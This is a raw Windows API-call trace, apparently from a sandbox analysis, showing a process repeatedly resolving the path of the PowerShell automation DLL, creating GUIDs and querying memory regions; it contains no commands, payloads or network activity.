	[0349.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.371] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.371] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x2772a1bf, Data2=0x241e, Data3=0x4128, Data4=([0]=0xab, [1]=0xc1, [2]=0x95, [3]=0x35, [4]=0xb4, [5]=0x45, [6]=0x5, [7]=0x46))) returned 0x0
	[0349.371] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xf732ff5, Data2=0x65ae, Data3=0x4467, Data4=([0]=0xb2, [1]=0xd7, [2]=0x72, [3]=0xa3, [4]=0xd0, [5]=0x15, [6]=0x3b, [7]=0x89))) returned 0x0
	[0349.371] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x4b57ffd2, Data2=0x51eb, Data3=0x497d, Data4=([0]=0x9c, [1]=0xf7, [2]=0xf0, [3]=0x66, [4]=0x8c, [5]=0x68, [6]=0xa4, [7]=0x30))) returned 0x0
	[0349.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xac880, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.372] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x805dfb68, Data2=0xd6e1, Data3=0x4456, Data4=([0]=0x90, [1]=0x22, [2]=0x8e, [3]=0xf3, [4]=0xb5, [5]=0x6b, [6]=0xba, [7]=0xd3))) returned 0x0
	[0349.372] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.372] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.373] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.373] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.373] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.373] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xaba20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabe90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xabde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0349.374] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.374] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.375] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.375] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.375] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.375] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.375] VirtualQuery (in: lpAddress=0xab310, lpBuffer=0xac1d0, dwLength=0x30 | out: lpBuffer=0xac1d0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.375] VirtualQuery (in: lpAddress=0xab3a0, lpBuffer=0xac260, dwLength=0x30 | out: lpBuffer=0xac260*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.375] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.375] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.376] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.376] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.376] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.376] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.376] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.376] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0x98f11a7b, Data2=0xbd8, Data3=0x4474, Data4=([0]=0x83, [1]=0x20, [2]=0xe2, [3]=0xda, [4]=0x67, [5]=0x4f, [6]=0xf9, [7]=0x86))) returned 0x0
	[0349.376] VirtualQuery (in: lpAddress=0xabc20, lpBuffer=0xacae0, dwLength=0x30 | out: lpBuffer=0xacae0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.377] VirtualQuery (in: lpAddress=0xabc20, lpBuffer=0xacae0, dwLength=0x30 | out: lpBuffer=0xacae0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.377] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.377] VirtualQuery (in: lpAddress=0xabc20, lpBuffer=0xacae0, dwLength=0x30 | out: lpBuffer=0xacae0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.377] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.377] VirtualQuery (in: lpAddress=0xabc20, lpBuffer=0xacae0, dwLength=0x30 | out: lpBuffer=0xacae0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.377] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.377] VirtualQuery (in: lpAddress=0xabc20, lpBuffer=0xacae0, dwLength=0x30 | out: lpBuffer=0xacae0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.377] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.378] VirtualQuery (in: lpAddress=0xabc20, lpBuffer=0xacae0, dwLength=0x30 | out: lpBuffer=0xacae0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.378] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.378] VirtualQuery (in: lpAddress=0xabc20, lpBuffer=0xacae0, dwLength=0x30 | out: lpBuffer=0xacae0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.378] VirtualQuery (in: lpAddress=0xabcb0, lpBuffer=0xacb70, dwLength=0x30 | out: lpBuffer=0xacb70*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.378] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.378] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.378] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.379] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.379] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.379] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.379] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.379] CoCreateGuid (in: pguid=0xad490 | out: pguid=0xad490*(Data1=0xec952874, Data2=0xe84, Data3=0x4759, Data4=([0]=0xbe, [1]=0x12, [2]=0xf8, [3]=0x32, [4]=0xf4, [5]=0xf, [6]=0x84, [7]=0xfd))) returned 0x0
	[0349.379] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.379] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.379] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.380] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.380] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.380] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.380] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.380] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.380] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.380] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.380] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.381] VirtualQuery (in: lpAddress=0xab8e0, lpBuffer=0xac7a0, dwLength=0x30 | out: lpBuffer=0xac7a0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.381] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.381] VirtualQuery (in: lpAddress=0xabca0, lpBuffer=0xacb60, dwLength=0x30 | out: lpBuffer=0xacb60*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0349.381] VirtualQuery (in: lpAddress=0xabc10, lpBuffer=0xacad0, dwLength=0x30 | out: lpBuffer=0xacad0*(BaseAddress=0xab000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
